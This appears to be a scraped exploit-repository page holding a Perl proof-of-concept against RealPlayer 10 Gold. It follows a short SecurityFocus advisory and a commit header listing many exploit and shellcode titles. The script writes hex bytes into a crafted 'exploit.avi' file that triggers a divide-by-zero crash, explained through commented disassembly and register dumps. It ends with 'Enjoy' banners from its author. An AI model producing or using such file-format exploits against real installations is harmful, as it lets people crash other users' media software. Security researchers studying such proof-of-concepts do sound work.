880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
65 lines
No EOL
2.8 KiB
Perl
Executable file
65 lines
No EOL
2.8 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/54220/info
|
|
|
|
Real Networks RealPlayer is prone to a remote denial-of-service vulnerability.
|
|
|
|
Successful exploits may allow attackers to crash the affected application, resulting in denial-of-service conditions.
|
|
|
|
RealPlayer 10 Gold is vulnerable; other versions may also be affected.
|
|
|
|
#------------------------------------------------------------------------#
|
|
# #
|
|
# Usage : perl realplayer.pl #
|
|
# #
|
|
#------------------------------------------------------------------------#
|
|
|
|
my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00
|
|
\x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb
|
|
\x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50
|
|
\x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e
|
|
\x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2
|
|
\x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2
|
|
\xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29
|
|
\xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53
|
|
\x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad
|
|
\x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61
|
|
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
|
|
\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff";
|
|
|
|
|
|
#[Disassembly]
|
|
#"\x0C\x20\x87\x74" PUSH EBX
|
|
#"\x0D\x20\x87\x74" MOV EAX,DWORD PTR SS:[EBP+8]
|
|
#"\x10\x20\x87\x74" MOV EBX,DWORD PTR SS:[EBP+C]
|
|
#"\x13\x20\x87\x74" MOV ECX,DWORD PTR SS:[EBP+10]
|
|
#"\x16\x20\x87\x74" MUL EBX
|
|
#"\x18\x20\x87\x74" MOV EBX,ECX
|
|
#"\x1A\x20\x87\x74" SHR EBX,1
|
|
#"\x1C\x20\x87\x74" ADD EAX,EBX
|
|
#"\x1E\x20\x87\x74" ADC EDX,0
|
|
#"\x21\x20\x87\x74" DIV ECX <<---- As we see we can't devise by Zero .So this occurs an error and the program crashes here .
|
|
|
|
#[Registers]
|
|
#EAX 00000000
|
|
#ECX 00000000
|
|
#EDX 00000000
|
|
#EBX 00000000
|
|
|
|
# error : Integer Division by Zero ---> Exception handling vulnerability .
|
|
|
|
# This Exception handling can lead to a DOS attack . However The Concept of using this vulnerability is the create an exception so the program crashes.And it's a local exploit .
|
|
|
|
|
|
|
|
|
|
my $file = "exploit.avi";
|
|
|
|
open ($File, ">$file");
|
|
print $File $h;
|
|
close ($File);
|
|
print "0/// Exploit By Dark-Puzzle ! \n";
|
|
print "1/// Follow me : http://fb.me/dark.puzzle \n";
|
|
print "0/// avi file Created Enjoy! \n";
|
|
print "N.B : If the program says to locate the file just browse into it's directory and select it , if not , Enjoy\n";
|
|
|
|
# End Of Exploit
|
|
#-------------------- |